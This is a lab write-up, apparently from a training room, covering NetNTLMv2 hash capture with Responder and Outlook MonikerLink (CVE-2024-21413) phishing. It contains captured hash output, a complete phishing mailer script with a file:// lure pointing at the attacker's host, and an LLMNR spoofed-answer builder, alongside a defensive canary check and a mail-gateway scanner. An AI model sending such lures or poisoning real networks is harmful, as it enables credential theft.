## https://sploitus.com/exploit?id=D0C24AAD-9B58-52E4-84F7-D9B05A16FE0A
Project Goal:
The project was created to demonstrate two techniques that chain together: capturing NetNTLMv2 authentication hashes from hosts on a network with Responder, and delivering a phishing email that abuses an Outlook link-handling flaw (CVE-2024-21413) so that the victim's mail client authenticates to the attacker's machine over SMB. Together they show how weak name-resolution protocols and a single clicked link can be turned into credential material for compromising systems.
Process Description
1. Capturing NTLM Hashes using Responder
Initially, I used the Responder tool to capture authentication hashes over the network. Responder answers LLMNR, NBT-NS and mDNS name queries with its own address and runs rogue SMB, HTTP and other services, so any host that then authenticates to it hands over a NetNTLMv2 challenge-response hash for the logged-on user. This is the first step for attacks that crack or relay captured hashes to gain access to systems.
I ran the following command to start Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
I configured Responder to listen on the ens5 interface. A hash is recorded each time a host authenticates to one of Responder's rogue services, whether because a poisoned name lookup sent it there or because a user opened a link pointing at the attacker's host; in this run the captured accounts included THM-MONIKERLINK\tryhackme and WORKGROUP\Administrator. Here's how the output looked when capturing the hashes:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212
[SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
[SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Responder also writes each capture to a file under its logs/ directory (for SMB, SMB-NTLMv2-SSP-<client-ip>.txt). These values are NetNTLMv2 challenge-responses rather than NT hashes, so they cannot be used for pass-the-hash; they can be cracked offline (hashcat mode 5600 accepts the line exactly as Responder prints it) or, where SMB signing is not enforced on the target, relayed to another host with a tool such as ntlmrelayx.
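To make the poisoning step concrete, here is an added example (not code from the original write-up or from Responder itself) that builds the LLMNR query a Windows host multicasts when DNS fails, the spoofed answer a poisoner like Responder sends back, and a canary check a defender can run: query a hostname that cannot exist and treat any reply as evidence of a poisoner. The host name and the attacker address 10.10.192.145 are constructed for the example; the live probe() at the end only reports something if a poisoner is actually on the segment.

```python
"""LLMNR poisoning from both sides, plus a canary check for it.

Added example, not code from the original write-up or from Responder. The
host names and IP addresses are constructed for the example.
"""
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # LLMNR link-local multicast
TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS-style encoding: length-prefixed labels ended by a zero byte."""
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in name.split(".")) + b"\x00"


def decode_name(data: bytes, off: int) -> tuple:
    """Decode labels at off; returns (name, offset just past the name)."""
    labels = []
    while True:
        n = data[off]
        if n & 0xC0:                 # LLMNR questions never use compression pointers
            raise ValueError("unexpected compression pointer")
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(data[off:off + n].decode("ascii"))
        off += n


def build_query(name: str, txid: int) -> bytes:
    """The query a Windows host multicasts when DNS cannot resolve a name."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)          # flags=0, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner sends back: same ID, QR=1, the question echoed, and one
    A record that points the victim at the attacker."""
    txid, _, qdcount, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    name, off = decode_name(query, 12)
    question = query[12:off + 4]                                  # name + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)     # QR=1, ANCOUNT=1
    rdata = socket.inet_aton(attacker_ip)
    rr = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return header + question + rr


def parse_answer(resp: bytes) -> tuple:
    """Return (txid, queried name, list of A-record IPs) from an LLMNR response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", resp[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    off, name, ips = 12, "", []
    for _ in range(qdcount):
        name, off = decode_name(resp, off)
        off += 4
    for _ in range(ancount):
        _, off = decode_name(resp, off)
        rtype, rclass, _, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        if rtype == TYPE_A and rclass == CLASS_IN and rdlen == 4:
            ips.append(socket.inet_ntoa(resp[off:off + 4]))
        off += rdlen
    return txid, name, ips


def poisoner_ips(query: bytes, resp: bytes) -> list:
    """Canary logic: the query asked for a name that cannot exist, so a reply
    matching its ID and name can only come from a poisoner; return its IPs."""
    txid = struct.unpack("!H", query[:2])[0]
    qname, _ = decode_name(query, 12)
    rid, rname, ips = parse_answer(resp)
    return ips if rid == txid and rname.lower() == qname.lower() else []


def probe(name: str = "fileserver-canary-7f3a", timeout: float = 2.0) -> list:
    """Live check: multicast the canary query and report who answered it."""
    q = build_query(name, 0x7F3A)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(q, (LLMNR_GROUP, LLMNR_PORT))
        data, _ = s.recvfrom(512)
    except OSError:                  # timeout (no poisoner answered) or no route
        return []
    finally:
        s.close()
    return poisoner_ips(q, data)


if __name__ == "__main__":
    q = build_query("fileserver-canary-7f3a", 0x7F3A)            # constructed exchange
    print("spoofed reply parses to:", parse_answer(build_poisoned_answer(q, "10.10.192.145")))
    print("poisoner IPs seen on the wire:", probe())
```

Run on a segment where Responder is active, probe() returns the poisoner's address within the timeout; a legitimate resolver never answers for a name that does not exist, which is what makes the canary reliable.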
2. Phishing Emails with Exploit
Next, I created a phishing email containing a link to an SMB share on the attacker's host (the machine running Responder) and sent it to the victim's address with a Python script using the smtplib library. The link looks like an ordinary hyperlink, but it is a file:// URL with an exclamation mark (!) after the share path. A vulnerable Outlook (CVE-2024-21413, known as MonikerLink) parses such a URL as a moniker and follows it without the Protected View warning it normally shows for file:// links, so the client connects to the attacker over SMB and authenticates, leaking the user's NetNTLMv2 hash to Responder.
The phishing link in the email looked like this:
<p><a href="file://10.10.192.145/test!exploit">Click me</a></p>
Here’s the full Python script used to send the phishing email:
import smtplib
import sys
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm'
receiver_email = 'victim@monikerlink.thm'
password = input("Enter your attacker email password: ")

# file:// link to the Responder host; the '!' after the share path is the
# CVE-2024-21413 trigger that makes Outlook skip its Protected View prompt
html_content = """\
<!DOCTYPE html> <html lang="en"> <p><a href="file://10.10.192.145/test!exploit">Click me</a></p> </html> """

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html')
message.attach(msgHtml)

# mail server that delivers to the victim (plain SMTP on port 25)
server = smtplib.SMTP('10.10.251.212', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    sys.exit(1)
try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\nEmail delivered")
except Exception as error:
    print(error)
finally:
    server.quit()
The script delivers the email through the SMTP server at 10.10.251.212 (the same host that appears as the client in Responder's output). When a user with an unpatched Outlook clicks the link, the client authenticates to 10.10.192.145 over SMB and Responder records the NetNTLMv2 hash; that is the CVE-2024-21413 exploitation path this project demonstrates.
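The defensive counterpart to the mailer above is a gateway check that finds this kind of link before it reaches a user. The following is an added example, not code from the original write-up: it parses a MIME message, extracts every href from its HTML parts, and flags file:// links whose path contains a '!' as MonikerLink-style, while also reporting plain file:// UNC links, which still prompt the user to authenticate to a remote share. The sample message is constructed inline in the same shape the write-up's script produces; the addresses and link text are assumptions for the example.

```python
"""Mail-gateway check for MonikerLink-style links (CVE-2024-21413).

Added example, not code from the original write-up. The sample message,
addresses and link targets below are constructed for the example.
"""
import email
from email import policy
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlsplit


class _LinkCollector(HTMLParser):
    """Collect href values; HTMLParser decodes entity-encoded attribute values
    (e.g. &#33; becomes !), so obfuscated links are seen in their real form."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value.strip())


def extract_links(html: str) -> List[str]:
    p = _LinkCollector()
    p.feed(html)
    p.close()
    return p.hrefs


def classify_link(href: str) -> Optional[str]:
    """'monikerlink' for file://host/share!anything, 'unc-file-link' for any
    other file:// link to a remote host, None for everything else."""
    u = urlsplit(href)
    if u.scheme.lower() != "file" or not u.netloc:   # local file:/// paths are out of scope
        return None
    if "!" in u.path:
        return "monikerlink"
    return "unc-file-link"


def scan_message(raw: bytes) -> List[Tuple[str, str]]:
    """Walk all text/html parts of a message and return (href, verdict) pairs."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for href in extract_links(part.get_content()):
            verdict = classify_link(href)
            if verdict:
                findings.append((href, verdict))
    return findings


# Constructed sample body: one benign link, the write-up's link, the same link
# with the '!' entity-encoded, and a plain UNC link without the bypass.
SAMPLE_HTML = """<html><body>
<p><a href="https://monikerlink.thm/report">Quarterly report</a></p>
<p><a href="file://10.10.192.145/test!exploit">Click me</a></p>
<p><a href="file://10.10.192.145/test&#33;exploit">Click me too</a></p>
<p><a href="file://10.10.192.145/share/notes.txt">Meeting notes</a></p>
</body></html>"""


def build_sample_eml() -> bytes:
    """Constructed message in the same shape the write-up's mailer produces."""
    msg = MIMEMultipart()
    msg["Subject"] = "Quarterly report"
    msg["From"] = "attacker@monikerlink.thm"
    msg["To"] = "victim@monikerlink.thm"
    msg.attach(MIMEText(SAMPLE_HTML, "html"))
    return msg.as_bytes()


if __name__ == "__main__":
    for href, verdict in scan_message(build_sample_eml()):
        print(f"{verdict:14} {href}")
```

Plugging scan_message() into a milter or a quarantine rule is enough to stop this specific lure; note that it deliberately inspects the decoded href, since an entity-encoded '!' renders and behaves exactly like a literal one in the mail client.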
Results
As a result, I was able to demonstrate two key aspects:
Capturing NetNTLMv2 hashes with Responder, the foundation for cracking or relaying network authentication.
Phishing with a CVE-2024-21413 link sent by the Python script: a single click makes a vulnerable Outlook authenticate to the attacker's host, so the two steps combine into a credential leak.
This project showed how weak name resolution and a client-side link-handling flaw can be exploited to gain access to systems. The same chain points at concrete defenses: disable LLMNR and NBT-NS, require SMB signing, block outbound SMB (TCP 445) at the network edge, apply Microsoft's fix for CVE-2024-21413, and filter file:// links at the mail gateway.